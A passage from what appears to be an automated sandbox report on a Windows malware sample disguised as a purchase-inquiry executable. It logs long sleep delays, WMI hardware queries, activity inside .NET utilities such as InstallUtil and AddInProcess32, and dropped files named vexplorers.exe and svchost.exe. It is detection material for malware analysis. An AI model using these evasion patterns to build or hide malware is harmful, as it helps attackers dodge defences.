                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -599477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -599349s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -599078s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -598953s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -598774s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99732s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99625s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8376Thread sleep count: 3120 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99516s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99391s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99266s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99156s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99047s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -98937s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -98828s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -98708s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -98578s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -98468s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -98359s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -98250s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -98140s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -98031s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -97922s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -97812s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -97700s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -97578s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -97468s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -97346s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -97219s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -97109s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -96980s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -96859s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -96750s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -96634s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -96516s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -96406s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -96297s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -96121s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -96013s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -95891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -95766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -95656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -95543s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -95432s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -594000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -593873s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99869s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99741s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99606s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99464s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99332s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99174s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -99034s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -98266s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -96985s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -96808s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -96664s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -96500s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -96368s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -96155s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -95961s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -95824s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -95655s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -95524s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -95386s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -95261s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -95148s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -95029s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -94919s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -94802s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -94675s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372Thread sleep time: -94555s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8888Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8868Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep count: 36 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -33204139332677172s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8984Thread sleep count: 6268 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -599838s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -599709s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -599567s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -599429s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -599216s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -599023s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -598886s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -598717s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -99876s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -99750s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -99613s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -99484s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -99322s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -99192s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -99064s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -98945s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -98828s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -98716s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -98593s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8984Thread sleep count: 3487 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -98484s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -98374s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -98265s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -98144s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -98027s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -97901s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -97781s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -97671s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -97561s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -97453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -97343s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -97233s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -97125s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -97015s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -96906s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -96796s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -96687s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -96578s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -96468s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -96359s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -96250s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -96140s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -96030s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -95921s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -95812s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -95702s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -95588s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -99953s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -99844s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -99734s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -99625s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -99516s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -99403s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -99282s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -99156s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -99046s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -98938s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -98813s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -98688s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -98563s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956Thread sleep time: -98438s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe TID: 9040Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe TID: 8204Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599594
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595703
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595498
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595384
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594687
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594530
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594271
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594126
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593856
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593275
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 592584
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99871
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99609
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99336
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99087
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97299
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97138
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96763
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96636
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96524
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96415
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95248
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94989
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94640
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 587093
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99782
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99657
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99532
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99407
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99227
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98782
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98657
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98532
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98380
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98251
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98126
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97980
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97874
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97680
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97376
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
